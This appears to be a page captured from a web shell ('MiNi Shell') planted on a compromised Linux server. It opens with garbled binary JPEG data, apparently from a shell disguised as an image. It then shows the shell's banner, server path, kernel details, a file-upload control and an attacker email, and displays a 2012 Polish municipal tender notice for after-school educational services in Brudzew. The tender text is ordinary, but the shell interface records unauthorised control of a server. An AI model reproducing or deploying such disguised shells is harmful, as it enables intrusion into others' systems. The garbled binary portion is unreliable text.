JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120926/367048-N-2012.html

<p class="kh_header"><b>Brudzew: Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w szkołach podstawowych w Gminie Brudzew-II edycja w roku szkolnym 2012_2013.</b><br>
<b>Numer ogłoszenia: 367048 - 2012; data zamieszczenia: 26.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Obsługi Oświaty , ul. Turkowska 29, 62-720 Brudzew, woj. wielkopolskie, tel. 063 2797020, faks 063 2797047.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brudzew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w szkołach podstawowych w Gminie Brudzew-II edycja w roku szkolnym 2012_2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Brudzew - II edycja w roku szkolnym 2012_2013. Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Zajęcia z uczestnikami projektu będą prowadzone na terenie placówki w czasie wolnym od obowiązkowych zajęć lekcyjnych według harmonogramu opracowanego przez osoby świadczące usługi po uzgodnieniu z dyrektorem szkoły.
2.Szczegółowy opis przedmiotu zamówienia:
Zakres ilość i rodzaj zajęć w poszczególnych szkołach określają szczegółowe zadania stanowiące części zamówienia. Pojęcie godzina należy rozumieć jako godzinę zegarową (60 min) w przypadku zajęć specjalistycznych wymienionych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 17 listopada 2010r. w sprawie organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. 10.228.1487. z późn. zm.) bądź jako godzina lekcyjna (45 min) w przypadkach zajęć dydaktyczno-wyrównawczych wymienionych w wyżej wymienionym Rozporządzeniu oraz zajęć pozostałych, które nie zostały wskazane w powyższym akcie prawnym.
Przedmiot zamówienia obejmuje następujące części:
Zadanie nr I. - Szkoła Podstawowa w Chrząblicach
1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012_2013, 60 godzin w 2 grupach dla:
a.klasa II - 30h - 1 grupa (część 1);
b.klasa III - 30h - 1 grupa (część 2);
2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 60 godzin w roku szkolnym 2012_2013  w dwóch grupach dla:
a.klasa II - 30h - 1 grupa,(część 3);
b.klasa III - 30h - 1 grupa (część 4);
3.Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 30 godzin w ciągu roku szkolnego 2012_2013 dla 1 grupy uczniów klasy III (część 5).
4.Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej 30h w ciągu roku szkolnego 2012_2013 dla 1 grupy uczniów klas II i III (część 6) .
5.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych pod względem matematyczno - przyrodniczym  - 60 godzin w ciągu roku szkolnego 2012_2013  w dwóch grupach dla:
a.klasa II-30h - 1 grupa (część 7);
b.klasa III - 30h - 1 grupa (część 8);
6.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych sportowo-zajęcia sportowe z tenisa stołowego i gry w szachy - 30 godzin w ciągu roku szkolnego 2012_2013 dla 1 grupy uczniów z klas od I-III(część 9).
7.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie j. angielskiego - 30 godzin w ciągu roku szkolnego 2012_2013 dla 1 grupy uczniów klasy I- III (część 10).
8.Zajęcia rozwijające zainteresowania uczniów uzdolnionych pod względem artystyczno-plastycznym-30 godzin w ciągu roku szkolnego 2012_2013 dla 1 grupy uczniów z klas I-III (część 11).
9.Zajęcia rozwijające zainteresowania uczniów pod względem informatycznym - 30 godzin w ciągu roku szkolnego 2012_2013 dla 1 grupy uczniów klas I-III (część 12).
Zadanie nr II-Szkoła Podstawowa w Galewie 
1.Zajęcia dla dzieci ze specyficznymi trudnościami w  czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012_2013 dla:
a.1 grupa uczniów klasy I - 30 h (część 13);
b.1 grupa uczniów klasy II - 30h (część 14);
c.1 grupa uczniów klasy III - 30h (część 15);
2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2012_2013
a.1 grupa uczniów klasy I-30h (część 16);
b.1 grupa uczniów klasy II - 30h (część 17);
c.1 grupa uczniów klasy III - 30h (część 18);
3.Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy realizowane w ciągu roku szkolnego 2012_2013 dla  2 grup, klasa I-30h, klasa III - 30h (część 19).
4.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych matematyczno-przyrodniczo  realizowane w ciągu roku szkolnego 2012_2013 dla:
a.1 grupa uczniów klasy I - 30h (część 20);
b.1 grupa uczniów klasy II - 30h (część 21);
c.1 grupa uczniów klasy III - 30h (część 22);
5.Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy- 30 godzin dla 1 grupy uczniów (część 23).
Zadanie nr III Szkoła Podstawowa w Koźminie z filią w Krwonach
1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012_2013 dla:
a.Klasy I SP w Koźminie -30h - 1 grupa (część 24);
b.Klasy II SP w Koźminie - 30h - 1 grupa (część 25);
c.Klasy III SP w Koźminie - 30h - 1 grupa (część 26);
d.Klasy I Filii w Krwonach - 30h -1 grupa (część 27);
e.Klasy II_III Filii w Krwonach - 30h - 1 grupa (część 28);
2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych realizowane w roku szkolnym 2012_2013 dla:
a.Klasy I SP w Koźminie - 30h - 1 grupa (część 29);
b.Klasy II SP w Koźminie - 30h - 1 grupa (część 30);
c.Klasy III SP w Koźminie - 30h - 1 grupa (część 31);
d.Klasy I Filii w Krwonach - 30h - 1 grupa (część 32);
e.Klasy II_III Filii w Krwonach - 30h - 1 grupa (część 33);
3.Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy realizowane w ciągu roku szkolnego 2012_2013 30 h dla 1 grupy z klas I-III (część 34).
4.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych matematycznie realizowane w ciągu roku szkolnego 2012_2013 dla:
a.Klasy I SP w Koźminie - 30h - 1 grupa (część 35);
b.Klasy II SP w Koźminie - 30h - 1 grupa (część 36);
c.Klasy III SP w Koźminie - 30h - 1 grupa (część 37);
d.Klasy I Filii w Krwonach - 30h - 1 grupa (część 38);
e.Klasy II-III Filii w Krwonach - 30h - 1 grupa (część 39);
Zadanie nr IV Zespół Szkolno-Gimnazjalny w Brudzewie
1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012_2013 dla:
a.Klasy Ia - 30h - 1 grupa (część 40);
b.Klasa Ib - 30h-1 grupa (część 41);
c.Klasy IIa - 30h-1 grupa (część 42);
d.Klasa IIb - 30h - 1 grupa (część 43);
e.Klasa IIIa - 30h - 1 grupa (część 44);
f.Klasa IIIb - 30h - 1 grupa (część 45);
2.Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy realizowane w ciągu roku szkolnego 2012_2013
a.Klasy I i II - 60h - w dwóch grupach (część 46); 
b.Klasy III - 60h - w dwóch grupach (część 47);
3.Zajęcia z gimnastyki korekcyjnej realizowane w roku szkolnym 2012_2013
a.Klasy III - 30h - 1grupa (część 48);
b.Klasy II i III - 60h - 2grupy (część 49);
4.Specjalistyczne zajęcia terapeutyczne-muzykoterapia dla 1 dziecka niepełnosprawnego realizowane w ciągu roku szkolnego 2012_2013 - 30 h (część 50).
5.Zajęcia specjalistyczne terapeutyczno-korekcyjno-kompensacyjne realizowane w ciągu roku szkolnego 2012_2013 dla klasy II i III - 60 h w dwóch grupach (część 51).
6.Zajęcia rozwijające zainteresowania uczniów uzdolnionych pod względem matematyczno-przyrodniczym realizowane w ciągu roku szkolnego 2012_2013 dla:
a.Klasy I - 30h - 1 grupa - zajęcia z obserwacji przyrodniczych (część 52);
b.Klasy I - 30h - 1 grupa - kółko matematyczno-przyrodnicze (część 53);
7.Zajęcia rozwijające uzdolnienia matematyczne realizowane w roku szkolnym 2012_2013 dla klasy II - 30h - 1 grupa (część 54).
8.Zajęcia rozwijające uzdolnienia plastyczno-muzyczne dla klasy III b - 30h - 11 uczniów (część 55).
9.Zajęcia rozwijające uzdolnienia polonistyczne - kółko polonistyczne, zajęcia przygotowujące do konkursów  realizowane w roku szkolnym 2012_2013 dla:
a.Klasa III  - 30h - 1 grupa-przygotowanie do konkursów (część 56);
b.Klasa III - 30h - 1  grupa-kółko polonistyczne (część 57);
10.Zajęcia rozwijające uzdolnienia teatralne realizowane w roku szkolnym 2012_2013 - Klasa I - 60h - 1 grupa (część 58).
Szczegółowe obowiązki prowadzących zajęcia w ramach programu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Brudzew w roku szkolnym 2012_2013, które są przedmiotem niniejszego zamówienia, zawarte są w Załączniku nr 3 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówienia uzupełniającego, zgodnie z art. 67 ust. 1 pkt 6 ustawy PZP, w przypadku zmian zasad projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej wprowadzonych przez Instytucję Zarządzającą Programem Operacyjnym Kapitał Ludzki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 58.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Każdy wykonawca usługi powinien posiadać stopień awansu zawodowego minimum nauczyciela kontraktowego.
2.	Wykonawcy poszczególnych zadań muszą spełniać następujące wymogi dotyczące wykształcenia:

Zadanie I.1.a, I.1.b, I.2.a, I.2b, I.5a, I.5.b, I.8., - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej
Zadanie I.3. - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii
Zadanie I.4. - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w terapii pedagogicznej
Zadanie I.6 - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego
Zadanie I.7. - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie filologii angielskiej
Zadanie I.9 - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym z uprawnieniami do nauczania informatyki


Zadanie II.1.a, II.1.b, II.1.c, II.2.a, II.2.b, II.2.c, II.4.a, II.4.b, II.4.c wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej
Zadanie II.3 - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii
Zadanie II.5 - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej


Zadanie III.1.a., III.1.b, III.1.c., III.1.d, III.1.e, III.2.a., III.2.b., III.2.c., III.2.d, III.2.e, III.4.a, III.4.b, III.4.c, III.4.d, III.4.e  wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej
Zadanie III.3.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii

Zadanie IV.1.a., IV.1.b., IV.1.c., IV.1.d, IV.1.e,IV.1.f, IV.6.a, IV.6.b., IV.7., IV.8., IV.9.a., IV.9.b., IV.10. - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej
Zadanie IV.2.a., IV.2.b- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii
Zadanie IV.3.a, IV.3.b - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej
Zadanie IV.4 - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjno-kompensacyjnej oraz ukończone warsztaty muzyczno-taneczne
Zadanie IV.5 - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w terapii pedagogicznej z edukacją integracyjną
Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu potwierdzenia dysponowania osobami zdolnymi do wykonania danego zadania w zamówieniu musi wykazać, że dysponuje zespołem zdolnym do realizacji zamówienia, a w szczególności co najmniej jedną osobą posiadającą kwalifikacje wymienione w pkt IV.1. podpunkt 2). Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich wykształcenia, niezbędnych do wykonania zamówienia wypełniony wg załącznika nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	przesunięcie okresu realizacji umowy, o którym mowa w § 6 ust.1 umowy 
w przypadku, gdyby nastąpiły opóźnienia związane z realizacją założeń projektowych, wynikające 
z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej.

2)	zmniejszenie wartości umowy, o której mowa w § 3 ust. 1 umowy, jest możliwe wyłącznie za zgodą obu stron umowy;

3)	w przypadku wystąpienia siły wyższej  możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;

4)	w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;

5)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brudzew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Obsługi Oświaty w Brudzewie, ul. Turkowska 29, 62-720 Brudzew..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2012 godzina 09:30, miejsce: Gminny Zespół Obsługi Oświaty w Brudzewie, ul. Turkowska 29, 62-720 Brudzew..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Brudzew - II edycja realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com